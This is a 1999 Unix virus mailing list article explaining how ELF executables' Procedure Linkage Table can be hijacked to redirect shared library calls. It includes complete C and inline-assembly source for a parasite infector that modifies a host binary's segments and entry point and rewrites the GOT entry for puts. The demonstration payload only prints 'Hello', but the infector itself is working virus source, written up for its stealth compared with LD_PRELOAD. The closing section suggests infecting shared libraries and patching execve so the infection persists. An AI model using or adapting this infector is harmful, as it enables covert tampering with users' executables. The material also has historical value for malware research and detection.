SHARED LIBRARY CALL REDIRECTION USING ELF PLT INFECTION - Silvio Cesare - The Unix Virus Mailing List - http://virus.beergrave.net - Novemeber 1999 INTRODUCTION This article describes a method of shared library call redirection using ELF infection that redirects the Procedure Linkage Table (PLT) of an executeable. Thus, redirection is not resident outside of the infected executeable. This has the advantage over the LD_PRELOAD redirection technique in that no environment variables are modified, thus remaining more hidden than previous techniques. An implementation is provided for x86/Linux. THE PROCEDURE LINKAGE TABLE (PLT) From the ELF specifications... (not necessary to read but gives more detail than the followup text) " Procedure Linkage Table Much as the global offset table redirects position-independent address calculations to absolute locations, the procedure linkage table redirects position-independent function calls to absolute locations. The link editor cannot resolve execution transfers (such as function calls) from one executable or shared object to another. Consequently, the link editor arranges to have the program transfer control to entries in the procedure linkage table. On the SYSTEM V architecture, procedure linkage tables reside in shared text, but they use addresses in the private global offset table. The dynamic linker determines the destinations' absolute addresses and modifies the global offset table's memory image accordingly. The dynamic linker thus can redirect the entries without compromising the position-independence and sharability of the program's text. Executable files and shared object files have separate procedure linkage tables. + Figure 2-12: Absolute Procedure Linkage Table {*} .PLT0:pushl got_plus_4 jmp *got_plus_8 nop; nop nop; nop .PLT1:jmp *name1_in_GOT pushl $offset jmp .PLT0@PC .PLT2:jmp *name2_in_GOT pushl $offset jmp .PLT0@PC ... + Figure 2-13: Position-Independent Procedure Linkage Table .PLT0:pushl 4(%ebx) jmp *8(%ebx) nop; nop nop; nop .PLT1:jmp *name1@GOT(%ebx) pushl $offset jmp .PLT0@PC .PLT2:jmp *name2@GOT(%ebx) pushl $offset jmp .PLT0@PC ... NOTE: As the figures show, the procedure linkage table instructions use different operand addressing modes for absolute code and for position-independent code. Nonetheless, their interfaces to the dynamic linker are the same. Following the steps below, the dynamic linker and the program ``cooperate'' to resolve symbolic references through the procedure linkage table and the global offset table. 1. When first creating the memory image of the program, the dynamic linker sets the second and the third entries in the global offset table to special values. Steps below explain more about these values. 2. If the procedure linkage table is position-independent, the address of the global offset table must reside in %ebx. Each shared object file in the process image has its own procedure linkage table, and control transfers to a procedure linkage table entry only from within the same object file. Consequently, the calling function is responsible for setting the global offset table base register before calling the procedure linkage table entry. 3. For illustration, assume the program calls name1, which transfers control to the label .PLT1. 4. The first instruction jumps to the address in the global offset table entry for name1. Initially, the global offset table holds the address of the following pushl instruction, not the real address of name1. 5. Consequently, the program pushes a relocation offset (offset) on the stack. The relocation offset is a 32-bit, non-negative byte offset into the relocation table. The designated relocation entry will have type R_386_JMP_SLOT, and its offset will specify the global offset table entry used in the previous jmp instruction. The relocation entry also contains a symbol table index, thus telling the dynamic linker what symbol is being referenced, name1 in this case. 6. After pushing the relocation offset, the program then jumps to .PLT0, the first entry in the procedure linkage table. The pushl instruction places the value of the second global offset table entry (got_plus_4 or 4(%ebx)) on the stack, thus giving the dynamic linker one word of identifying information. The program then jumps to the address in the third global offset table entry (got_plus_8 or 8(%ebx)), which transfers control to the dynamic linker. 7. When the dynamic linker receives control, it unwinds the stack, looks at the designated relocation entry, finds the symbol's value, stores the ``real'' address for name1 in its global offset table entry, and transfers control to the desired destination. 8. Subsequent executions of the procedure linkage table entry will transfer directly to name1, without calling the dynamic linker a second time. That is, the jmp instruction at .PLT1 will transfer to name1, instead of ``falling through'' to the pushl instruction. The LD_BIND_NOW environment variable can change dynamic linking behavior. If its value is non-null, the dynamic linker evaluates procedure linkage table entries before transferring control to the program. That is, the dynamic linker processes relocation entries of type R_386_JMP_SLOT during process initialization. Otherwise, the dynamic linker evaluates procedure linkage table entries lazily, delaying symbol resolution and relocation until the first execution of a table entry. NOTE: Lazy binding generally improves overall application performance, because unused symbols do not incur the dynamic linking overhead. Nevertheless, two situations make lazy binding undesirable for some applications. First, the initial reference to a shared object function takes longer than subsequent calls, because the dynamic linker intercepts the call to resolve the symbol. Some applications cannot tolerate this unpredictability. Second, if an error occurs and the dynamic linker cannot resolve the symbol, the dynamic linker will terminate the program. Under lazy binding, this might occur at arbitrary times. Once again, some applications cannot tolerate this unpredictability. By turning off lazy binding, the dynamic linker forces the failure to occur during process initialization, before the application receives control. " To explain in more detail... Shared library calls are treated special in executeable objects because they cannot be linked to the executeable at compile time. This is due to the fact that shared libraries are not available to the executeable until runtime. The PLT was designed to handle such cases like these. The PLT holds the code responsible for calling the dynamic linker to locate these desired routines. Instead of calling the real shared library routine in the executeable, the exucuteable calls an entry in the PLT. It is then up to the PLT to resolve the symbol it represents and do the right thing. From the ELF specifications... " .PLT1:jmp *name1_in_GOT pushl $offset jmp .PLT0@PC " This is the important info. This is the routine called instead of the library call. name1_in_GOT originally starts off pointing to the following pushl instruction. The offset represents a relocation (see the ELF specifications) offset which has a reference to the symbol the library call represents. This is used for the final jmp which jumps to the dynamic linker. The dynamic linker then changes name1_in_GOT to point directly to the routine thus avoiding dynamic linking a second time. This summarizes the importance of the PLT in library lookups. It can be noted that we can change name_in_GOT to point to our own code, thus replacing library calls. If we save the state of the GOT before replacing, we can call the old library routine and thus redirect any library call. ELF INFECTION To inject a redirected library call into an executeable requires new code to be added to an executeable. The actual procedure for ELF infection will not be described here as it has been covered very well in previous articles (http://www.big.net.au/~silvio - Unix Viruses/Unix ELF Parasites and Virus). PLT REDIRECTION The algorithm at the entry point code is as follows... * mark the text segment writeable * save the PLT(GOT) entry * replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... * do the payload of the new lib call * restore the original PLT(GOT) entry * call the lib call * save the PLT(GOT) entry again (if its changed) * replace the PLT(GOT) entry with the address of the new lib call GOT ADDRESS To extract the GOT address one must work backwords from the .rel.plt section as explained in the above information on the PLT. int do_dyn_symtab( int fd, Elf32_Shdr *shdr, Elf32_Shdr *shdrp, const char *sh_function ) { Elf32_Shdr *strtabhdr = &shdr[shdrp->sh_link]; char *string; Elf32_Sym *sym, *symp; int i; string = (char *)malloc(strtabhdr->sh_size); if (string == NULL) { perror("malloc"); exit(1); } if (lseek( fd, strtabhdr->sh_offset, SEEK_SET) != strtabhdr->sh_offset ) { perror("lseek"); exit(1); } if (read(fd, string, strtabhdr->sh_size) != strtabhdr->sh_size) { perror("read"); exit(1); } sym = (Elf32_Sym *)malloc(shdrp->sh_size); if (sym == NULL) { perror("malloc"); exit(1); } if (lseek(fd, shdrp->sh_offset, SEEK_SET) != shdrp->sh_offset) { perror("lseek"); exit(1); } if (read(fd, sym, shdrp->sh_size) != shdrp->sh_size) { perror("read"); exit(1); } symp = sym; for (i = 0; i < shdrp->sh_size; i += sizeof(Elf32_Sym)) { if (!strcmp(&string[symp->st_name], sh_function)) { free(string); return symp - sym; } ++symp; } free(string); return -1; } int get_sym_number( int fd, Elf32_Ehdr *ehdr, Elf32_Shdr *shdr, const char *sh_function ) { Elf32_Shdr *shdrp = shdr; int i; for (i = 0; i < ehdr->e_shnum; i++) { if (shdrp->sh_type == SHT_DYNSYM) { return do_dyn_symtab(fd, shdr, shdrp, sh_function); } ++shdrp; } } int do_rel(int fd, Elf32_Shdr *shdr, int sym) { Elf32_Rel *rel, *relp; int i; rel = (Elf32_Rel *)malloc(shdr->sh_size); if (rel == NULL) { perror("malloc"); exit(1); } if (lseek(fd, shdr->sh_offset, SEEK_SET) != shdr->sh_offset) { perror("lseek"); exit(1); } if (read(fd, rel, shdr->sh_size) != shdr->sh_size) { perror("read"); exit(1); } relp = rel; for (i = 0; i < shdr->sh_size; i += sizeof(Elf32_Rel)) { if (ELF32_R_SYM(relp->r_info) == sym) { return relp->r_offset; } ++relp; } return -1; } int find_rel( int fd, const char *string, Elf32_Ehdr *ehdr, Elf32_Shdr *shdr, const char *sh_function ) { Elf32_Shdr *shdrp = shdr; int sym; int i; sym = get_sym_number(fd, ehdr, shdr, sh_function); if (sym < 0) { return -1; } for (i = 0; i < ehdr->e_shnum; i++) { if (!strcmp(&string[shdrp->sh_name], ".rel.plt")) { return do_rel(fd, shdrp, sym); } ++shdrp; } return -1; } PLT REDIRECTION To explain more how PLT redirection is done, the simplest method is to describe the sample code supplied; comments are marked with a hash sign (#). This code is injected into an executeable and becomes the new entry point of the program. The library call that is redirected is printf, the new code prints a message before the printf supplied string. -- # # This routine is used for chaining a virus. That is to keep the entry point # the same but append new code to the host. # void virchfunc(void) { __asm__(" .globl virchstart .type virchstart,@function virchstart: call virchmain virchmain: popl %esi # addl $(virchdata - virchmain),%esi # movl $virdata,%esi movl data_entry_point - virchdata(%esi),%edi # movl data_entry_point,%edi jmp *%edi .globl virchdata .type virchdata,@function virchdata: .globl data_entry_point .size data_entry_point,4 .type data_entry_point,@object data_entry_point: .long 0 .globl virchend .type virchend,@function virchend: "); } # # This is the heart of the parasite # void virfunc(void) { __asm__(" .globl L1 .type virstart,@function virstart: # # save the registers. esi and edi arent used on startup so we can ignore them # pushl %eax pushl %ebx pushl %ecx pushl %edx # # dynamically determine the address of the virus data # call virmain virmain: popl %esi # addl $(virdata - virmain),%esi # movl $virdata,%esi # # we save the address of the original PLT reference to be later used. This # will be the address of the following instruction in the actual PLT # movl plt_addr - virdata(%esi),%ebx # movl (%ebx),%ecx # movl %ecx,orig_plt_addr - virdata(%esi) # movl plt_addr,orig_plt_addr # # we copy our new procedure to the GOT (from the PLT). # movl %esi,%ebx # subl $(virdata - plt_puts),%ebx # movl plt_addr - virdata(%esi),%ecx # movl %ebx,(%ecx) # movl $plt_puts,plt_addr # # This is part of the chaining routine. we mark the entry point segment # writeable and copy back the original data # movl $125,%eax movl orig_entry_point - virdata(%esi),%ebx movl %ebx,%edi # for later andl $~4095,%ebx movl $8192,%ecx movl $7,%edx int $0x80 pushl %edi leal store - virdata(%esi),%esi movl $(virchend - virchstart),%ecx rep movsb popl %edi # # restore the registers (remember esi and edi arent used) # popl %edx popl %ecx popl %ebx popl %eax # # jump back to the entry point # jmp *%edi # # this routine is used by orig_plt_func to obtain the address of the virus # data. so we can modify saved plt info. # .globl getvirdata .type getvirdata,@function getvirdata: pushl %ebp movl %esp,%ebp call getvirdatamain getvirdatamain: popl %eax # addl $(virdata - getvirdatamain),%eax # movl $virdata,%eax movl %ebp,%esp popl %ebp ret .globl virdata .type virdata,@function virdata: .globl orig_entry_point .size orig_entry_point,4 .type orig_entry_point,@object orig_entry_point: .long 0 .globl orig_plt_addr .size orig_plt_addr,4 .type orig_plt_addr,@object orig_plt_addr: .long 0 .globl plt_addr .size plt_addr,4 .type plt_addr,@object plt_addr: .long 0 .globl store .type store,@object .size store,virchend- virchstart store: .zero virchend - virchstart .globl virend .type virend,@function virend: "); /* we have a little wasted space here from cleaning up the stack frame in the wrapper function. */ } # # position independant data # char *get_msg(void) { __asm__(" call msgmain msgmain: popl %eax addl $(msgdata - msgmain),%eax jmp msgend msgdata: .ascii \"Hello \" msgend: "); } int orig_plt_func(char *s) { long *data = getvirdata(); int (*f)(char *); int ret; # # we copy the original PLT(GOT) address back to the PLT(GOT) so we can call # the original function. in this case 'puts' (or perhaps the dynamic linker) # f = (void *)(*(long *)data[PLT_ADDR] = data[ORIG_PLT_ADDR]); # # call the original function # ret = f(s); # # the PLT may have changed now, so we save it again. remember that if lazy # linking is used, the dynamic linker may change the PLT to point directly at # the shared lib call instead of calling the dynamic linker again # data[ORIG_PLT_ADDR] = *(long *)data[PLT_ADDR]; /* the following line doesnt compile very nicely as it doesnt shortcut the subtraction */ # # change the PLT back to call the new 'puts' call # *(long *)data[PLT_ADDR] = (long)&((char *)data)[ (long)plt_puts - (long)virdata ]; return ret; } # # this is the new 'puts' function. this can be anything, but remember, it # has to be position independant. which means if you cant use libc or absolute # information. # int plt_puts(char *s) { _write(1, get_msg(), 6); return orig_plt_func(s); } # # the end of the virus # void virendall(void) { } -- snip FUTURE DIRECTIONS It is possible to infect a shared library directly, and this is sometimes more desireable because the redirection stays resident for all executeables. Also possible, is an even more stealth version of the PLT redirection described by modifying the process image directly thus the host executeable stays unmodified. This however has the disadvantage that the redirection stays active only for the life of a single process, but if the system call execve is patched this can be restarted on each execution. CONCLUSION This article has described a method of redirecting shared library calls in an executeable by directly modifying the PLT of the executeable in question using ELF infection techniques. It is more stealthy than previous techniques using LD_PRELOAD and has large possibilities. -- plt.c (MUST be compiled with -O2) #include #include #include #include #include #include #include #include #include #include #define ORIG_PLT_ADDR 1 #define PLT_ADDR 2 #define VIRUS_LENGTH (virendall - virstart) #define CHAIN_LENGTH (virchend - virchstart) #define PAGE_SIZE 4096 #define PAGE_MASK (PAGE_SIZE - 1) #define DEBUG_STRING ".data1" extern long orig_entry_point; extern long orig_plt_addr; extern long plt_addr; extern long data_entry_point; extern char *store; void virstart(void); void virend(void); void virchstart(void); void virchend(void); void virchdata(void); void virdata(void); long *getvirdata(void); int plt_puts(char *s); typedef struct { Elf32_Ehdr ehdr; Elf32_Phdr* phdr; Elf32_Shdr* shdr; int plen; char** section; char* string; int bss; } bin_t; #define __syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \ type name(type1 arg1,type2 arg2,type3 arg3) \ { \ long __res; \ __asm__ volatile ("int $0x80" \ : "=a" (__res) \ : "0" (__NR##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \ "d" ((long)(arg3))); \ return (type) __res; \ } static inline __syscall3(int,_write,int,fd,const void *,buf,int,size); void virchfunc(void) { __asm__(" .globl virchstart .type virchstart,@function virchstart: call virchmain virchmain: popl %esi # addl $(virchdata - virchmain),%esi # movl $virdata,%esi movl data_entry_point - virchdata(%esi),%edi # movl data_entry_point,%edi jmp *%edi .globl virchdata .type virchdata,@function virchdata: .globl data_entry_point .size data_entry_point,4 .type data_entry_point,@object data_entry_point: .long 0 .globl virchend .type virchend,@function virchend: "); } void virfunc(void) { __asm__(" .globl L1 .type virstart,@function virstart: pushl %eax pushl %ebx pushl %ecx pushl %edx call virmain virmain: popl %esi # addl $(virdata - virmain),%esi # movl $virdata,%esi movl plt_addr - virdata(%esi),%ebx # movl (%ebx),%ecx # movl %ecx,orig_plt_addr - virdata(%esi) # movl plt_addr,orig_plt_addr movl %esi,%ebx # subl $(virdata - plt_puts),%ebx # movl plt_addr - virdata(%esi),%ecx # movl %ebx,(%ecx) # movl $plt_puts,plt_addr movl $125,%eax movl orig_entry_point - virdata(%esi),%ebx movl %ebx,%edi # for later andl $~4095,%ebx movl $8192,%ecx movl $7,%edx int $0x80 pushl %edi leal store - virdata(%esi),%esi movl $(virchend - virchstart),%ecx rep movsb popl %edi popl %edx popl %ecx popl %ebx popl %eax jmp *%edi .globl getvirdata .type getvirdata,@function getvirdata: pushl %ebp movl %esp,%ebp call getvirdatamain getvirdatamain: popl %eax # addl $(virdata - getvirdatamain),%eax # movl $virdata,%eax movl %ebp,%esp popl %ebp ret .globl virdata .type virdata,@function virdata: .globl orig_entry_point .size orig_entry_point,4 .type orig_entry_point,@object orig_entry_point: .long 0 .globl orig_plt_addr .size orig_plt_addr,4 .type orig_plt_addr,@object orig_plt_addr: .long 0 .globl plt_addr .size plt_addr,4 .type plt_addr,@object plt_addr: .long 0 .globl store .type store,@object .size store,virchend- virchstart store: .zero virchend - virchstart .globl virend .type virend,@function virend: "); /* we have a little wasted space here from cleaning up the stack frame in the wrapper function. */ } char *get_msg(void) { __asm__(" call msgmain msgmain: popl %eax addl $(msgdata - msgmain),%eax jmp msgend msgdata: .ascii \"Hello \" msgend: "); } int orig_plt_func(char *s) { long *data = getvirdata(); int (*f)(char *); int ret; f = (void *)(*(long *)data[PLT_ADDR] = data[ORIG_PLT_ADDR]); ret = f(s); data[ORIG_PLT_ADDR] = *(long *)data[PLT_ADDR]; /* the following line doesnt compile very nicely as it doesnt shortcut the subtraction */ *(long *)data[PLT_ADDR] = (long)&((char *)data)[ (long)plt_puts - (long)virdata ]; return ret; } int plt_puts(char *s) { _write(1, get_msg(), 6); return orig_plt_func(s); } void virendall(void) { } char *get_virus(void) { return (char *)virstart; } int init_virus( int plt, int text_start, int data_start, int data_memsz, int entry, bin_t *bin ) { int code_start = data_start + data_memsz; int i; if (mprotect( (void *)((long)virstart & (~PAGE_MASK)), PAGE_SIZE << 1, PROT_READ | PROT_WRITE ) < 0) { perror("mprotect"); exit(1); } if (mprotect( (void *)((long)virchstart & (~PAGE_MASK)), PAGE_SIZE << 1, PROT_READ | PROT_WRITE ) < 0) { perror("mprotect"); exit(1); } data_entry_point = code_start; orig_entry_point = entry; plt_addr = plt; for (i = 0; i < bin->bss; i++) { long vaddr = bin->shdr[i].sh_addr; if (entry >= vaddr && entry < (vaddr + bin->shdr[i].sh_size)) { char *p = &bin->section[i][entry - vaddr]; memcpy(&store, p, CHAIN_LENGTH); memcpy(p, virchstart, CHAIN_LENGTH); break; } } return 0; } void do_elf_checks(Elf32_Ehdr *ehdr) { if (strncmp(ehdr->e_ident, ELFMAG, SELFMAG)) { fprintf(stderr, "File not ELF\n"); exit(1); } if (ehdr->e_type != ET_EXEC) { fprintf(stderr, "ELF type not ET_EXEC or ET_DYN\n"); exit(1); } if (ehdr->e_machine != EM_386 && ehdr->e_machine != EM_486) { fprintf(stderr, "ELF machine type not EM_386 or EM_486\n"); exit(1); } if (ehdr->e_version != EV_CURRENT) { fprintf(stderr, "ELF version not current\n"); exit(1); } } int do_dyn_symtab( int fd, Elf32_Shdr *shdr, Elf32_Shdr *shdrp, const char *sh_function ) { Elf32_Shdr *strtabhdr = &shdr[shdrp->sh_link]; char *string; Elf32_Sym *sym, *symp; int i; string = (char *)malloc(strtabhdr->sh_size); if (string == NULL) { perror("malloc"); exit(1); } if (lseek( fd, strtabhdr->sh_offset, SEEK_SET) != strtabhdr->sh_offset ) { perror("lseek"); exit(1); } if (read(fd, string, strtabhdr->sh_size) != strtabhdr->sh_size) { perror("read"); exit(1); } sym = (Elf32_Sym *)malloc(shdrp->sh_size); if (sym == NULL) { perror("malloc"); exit(1); } if (lseek(fd, shdrp->sh_offset, SEEK_SET) != shdrp->sh_offset) { perror("lseek"); exit(1); } if (read(fd, sym, shdrp->sh_size) != shdrp->sh_size) { perror("read"); exit(1); } symp = sym; for (i = 0; i < shdrp->sh_size; i += sizeof(Elf32_Sym)) { if (!strcmp(&string[symp->st_name], sh_function)) { free(string); return symp - sym; } ++symp; } free(string); return -1; } int get_sym_number( int fd, Elf32_Ehdr *ehdr, Elf32_Shdr *shdr, const char *sh_function ) { Elf32_Shdr *shdrp = shdr; int i; for (i = 0; i < ehdr->e_shnum; i++) { if (shdrp->sh_type == SHT_DYNSYM) { return do_dyn_symtab(fd, shdr, shdrp, sh_function); } ++shdrp; } } int do_rel(int fd, Elf32_Shdr *shdr, int sym) { Elf32_Rel *rel, *relp; int i; rel = (Elf32_Rel *)malloc(shdr->sh_size); if (rel == NULL) { perror("malloc"); exit(1); } if (lseek(fd, shdr->sh_offset, SEEK_SET) != shdr->sh_offset) { perror("lseek"); exit(1); } if (read(fd, rel, shdr->sh_size) != shdr->sh_size) { perror("read"); exit(1); } relp = rel; for (i = 0; i < shdr->sh_size; i += sizeof(Elf32_Rel)) { if (ELF32_R_SYM(relp->r_info) == sym) { return relp->r_offset; } ++relp; } return -1; } int find_rel( int fd, const char *string, Elf32_Ehdr *ehdr, Elf32_Shdr *shdr, const char *sh_function ) { Elf32_Shdr *shdrp = shdr; int sym; int i; sym = get_sym_number(fd, ehdr, shdr, sh_function); if (sym < 0) { return -1; } for (i = 0; i < ehdr->e_shnum; i++) { if (!strcmp(&string[shdrp->sh_name], ".rel.plt")) { return do_rel(fd, shdrp, sym); } ++shdrp; } return -1; } void load_section(char **section, int fd, Elf32_Shdr *shdr) { if (lseek(fd, shdr->sh_offset, SEEK_SET) < 0) { perror("lseek"); exit(1); } *section = (char *)malloc(shdr->sh_size); if (*section == NULL) { perror("malloc"); exit(1); } if (read(fd, *section, shdr->sh_size) != shdr->sh_size) { perror("read"); exit(1); } } int load_bin(int fd, bin_t *bin) { char **sectionp; Elf32_Ehdr *ehdr; Elf32_Shdr *shdr; int slen; Elf32_Shdr *strtabhdr; int i; ehdr = &bin->ehdr; if (read(fd, ehdr, sizeof(Elf32_Ehdr)) != sizeof(Elf32_Ehdr)) { perror("read"); exit(1); } do_elf_checks(ehdr); bin->phdr = (Elf32_Phdr *)malloc( bin->plen = sizeof(Elf32_Phdr)*ehdr->e_phnum ); if (bin->phdr == NULL) { perror("malloc"); exit(1); } /* read the phdr's */ if (lseek(fd, ehdr->e_phoff, SEEK_SET) < 0) { perror("lseek"); exit(1); } if (read(fd, bin->phdr, bin->plen) != bin->plen) { perror("read"); exit(1); } slen = sizeof(Elf32_Shdr)*ehdr->e_shnum; bin->shdr = (Elf32_Shdr *)malloc(slen); if (bin->shdr == NULL) { perror("malloc"); exit(1); } bin->section = (char **)malloc(sizeof(char **)*ehdr->e_shnum); if (bin->section == NULL) { perror("malloc"); exit(1); } if (lseek(fd, ehdr->e_shoff, SEEK_SET) < 0) { perror("lseek"); exit(1); } if (read(fd, bin->shdr, slen) != slen) { perror("read"); exit(1); } strtabhdr = &bin->shdr[ehdr->e_shstrndx]; bin->string = (char *)malloc(strtabhdr->sh_size); if (bin->string == NULL) { perror("malloc"); exit(1); } if (lseek( fd, strtabhdr->sh_offset, SEEK_SET ) != strtabhdr->sh_offset) { perror("lseek"); exit(1); } if (read(fd, bin->string, strtabhdr->sh_size) != strtabhdr->sh_size) { perror("read"); exit(1); } bin->bss = -1; for ( i = 0, sectionp = bin->section, shdr = bin->shdr; i < ehdr->e_shnum; i++, sectionp++ ) { if (shdr[i].sh_type == SHT_NOBITS) { bin->bss = i; } else { load_section(sectionp, fd, &shdr[i]); } } if (bin->bss < 0) { printf("No bss section\n"); exit(1); } return 0; } void infect_elf( char *host, char *(*get_virus)(void), int (*init_virus)(int, int, int, int, int, bin_t *), int len, const char *sh_function ) { Elf32_Phdr *phdr; Elf32_Shdr *shdr; int move = 0; int out, fd; int evaddr, text_start = -1, plt; int bss_len, addlen, addlen2, addlen3; int offset, pos, oshoff; int i; char null = 0; struct stat st_buf; char tempname[8] = "vXXXXXX"; bin_t bin; Elf32_Shdr newshdr; char *zero; fd = open(host, O_RDONLY); if (fd < 0) { perror("open"); exit(1); } /* read the ehdr */ load_bin(fd, &bin); plt = find_rel( fd, bin.string, &bin.ehdr, bin.shdr, sh_function ); if (plt < 0) { printf("No dynamic function: %s\n", sh_function); exit(1); } phdr = bin.phdr; for (i = 0; i < bin.ehdr.e_phnum; i++) { if (phdr->p_type == PT_LOAD) { if (phdr->p_offset == 0) { text_start = phdr->p_vaddr; } else { if (text_start < 0) { fprintf(stderr, "No text segment??\n"); exit(1); } /* is this the data segment ? */ offset = phdr->p_offset + phdr->p_filesz; bss_len = phdr->p_memsz - phdr->p_filesz; if (init_virus != NULL) init_virus( plt, text_start, phdr->p_vaddr, phdr->p_memsz, bin.ehdr.e_entry, &bin ); break; } } ++phdr; } addlen = len + bss_len; /* update the phdr's to reflect the extention of the data segment (to allow virus insertion) */ phdr = bin.phdr; for (i = 0; i < bin.ehdr.e_phnum; i++) { if (phdr->p_type != PT_DYNAMIC) { if (move) { phdr->p_offset += addlen; } else if (phdr->p_type == PT_LOAD && phdr->p_offset) { /* is this the data segment ? */ phdr->p_filesz += addlen; phdr->p_memsz += addlen; move = 1; } } ++phdr; } /* update ehdr to reflect new offsets */ if (fstat(fd, &st_buf) < 0) { perror("fstat"); exit(1); } /* write the new virus */ if (mktemp(tempname) == NULL) { perror("mktemp"); exit(1); } out = open(tempname, O_WRONLY | O_CREAT | O_EXCL, st_buf.st_mode); if (out < 0) { perror("open"); exit(1); } addlen2 = addlen + sizeof(DEBUG_STRING); addlen3 = addlen2 + sizeof(Elf32_Shdr); bin.ehdr.e_shoff += addlen2; ++bin.ehdr.e_shstrndx; ++bin.ehdr.e_shnum; if (write(out, &bin.ehdr, sizeof(Elf32_Ehdr)) != sizeof(Elf32_Ehdr)) { perror("write"); goto cleanup; } --bin.ehdr.e_shnum; --bin.ehdr.e_shstrndx; if (write(out, bin.phdr, bin.plen) != bin.plen) { perror("write"); goto cleanup; } for (i = 0; i < bin.bss; i++) { if (lseek(out, bin.shdr[i].sh_offset, SEEK_SET) < 0) goto cleanup; if (write( out, bin.section[i], bin.shdr[i].sh_size ) != bin.shdr[i].sh_size) goto cleanup; } zero = (char *)malloc(bss_len); memset(zero, 0, bss_len); if (write(out, zero, bss_len) != bss_len) { perror("write"); goto cleanup; } if (write(out, get_virus(), len) != len) { perror("write"); goto cleanup; } for (i = bin.bss + 1; i <= bin.ehdr.e_shstrndx; i++) { if (lseek(out, addlen + bin.shdr[i].sh_offset, SEEK_SET) < 0) goto cleanup; if (write( out, bin.section[i], bin.shdr[i].sh_size ) != bin.shdr[i].sh_size) goto cleanup; } if (write( out, DEBUG_STRING, sizeof(DEBUG_STRING) ) != sizeof(DEBUG_STRING)) { perror("write"); goto cleanup; } if (lseek(out, bin.ehdr.e_shoff, SEEK_SET) < 0) goto cleanup; for (i = 0; i < bin.bss; i++) if (write( out, &bin.shdr[i], sizeof(Elf32_Shdr) ) != sizeof(Elf32_Shdr)) goto cleanup; newshdr.sh_name = bin.shdr[bin.ehdr.e_shstrndx].sh_size; newshdr.sh_type = SHT_PROGBITS; newshdr.sh_flags = SHF_ALLOC | SHF_WRITE; newshdr.sh_addr = bin.shdr[i].sh_addr; newshdr.sh_offset = offset; newshdr.sh_size = addlen; newshdr.sh_link = 0; newshdr.sh_info = 0; newshdr.sh_addralign = 0; newshdr.sh_entsize = 0; if (write(out, &newshdr, sizeof(Elf32_Shdr)) != sizeof(Elf32_Shdr)) goto cleanup; bin.shdr[i].sh_offset += addlen; bin.shdr[i].sh_addr += addlen; bin.shdr[i].sh_size = 0; if (write( out, &bin.shdr[i], sizeof(Elf32_Shdr) ) != sizeof(Elf32_Shdr)) goto cleanup; for (++i; i < bin.ehdr.e_shstrndx; i++) { bin.shdr[i].sh_offset += addlen; if (write( out, &bin.shdr[i], sizeof(Elf32_Shdr) ) != sizeof(Elf32_Shdr)) goto cleanup; } bin.shdr[i].sh_size += sizeof(DEBUG_STRING); bin.shdr[i].sh_offset += addlen; if (write( out, &bin.shdr[i], sizeof(Elf32_Shdr) ) != sizeof(Elf32_Shdr)) goto cleanup; for (++i; i < bin.ehdr.e_shnum; i++) { bin.shdr[i].sh_offset += addlen3; if (write( out, &bin.shdr[i], sizeof(Elf32_Shdr) ) != sizeof(Elf32_Shdr)) goto cleanup; } for (i = bin.ehdr.e_shstrndx + 1; i < bin.ehdr.e_shnum; i++) { if (lseek(out, addlen3 + bin.shdr[i].sh_offset, SEEK_SET) < 0) goto cleanup; if (write( out, bin.section[i], bin.shdr[i].sh_size ) != bin.shdr[i].sh_size) goto cleanup; } if (rename(tempname, host) < 0) { perror("rename"); exit(1); } if (fchown(out, st_buf.st_uid, st_buf.st_gid) < 0) { perror("chown"); exit(1); } free(zero); return; cleanup: unlink(tempname); exit(1); } int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "usage: infect-data-segment filename\n"); exit(1); } infect_elf( argv[1], get_virus, init_virus, VIRUS_LENGTH, "puts" ); exit(0); }